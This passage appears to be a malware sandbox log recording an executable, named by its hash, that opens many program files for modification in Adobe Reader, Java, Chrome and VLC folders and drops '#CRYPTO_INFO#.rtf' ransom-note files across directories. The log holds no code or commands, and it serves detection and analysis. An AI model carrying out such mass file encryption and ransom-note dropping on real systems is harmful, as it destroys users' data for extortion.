8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\progress.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-disabled_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\et_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.webapp_3.6.300.v20140407-1855.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\share.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_uinline_warning.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hu.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\gu.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\open_original_form.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\SearchEmail2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\amd64\jvm.cfg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\am_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\share_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_anonymoususer_24.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pt-BR.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ar-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javah.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\sunjce_provider.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_closereview_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\jp2launcher.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\remove.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ru_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_sent.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\fillandsign.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\mobile_fillsign_logo.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\cacerts 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\COPYRIGHT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-actions.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\sunpkcs11.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\EnableWrite.wmv 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\sunmscapi.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\skins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Scan_visual.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\faf_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\dd_arrow_small2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\bun.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 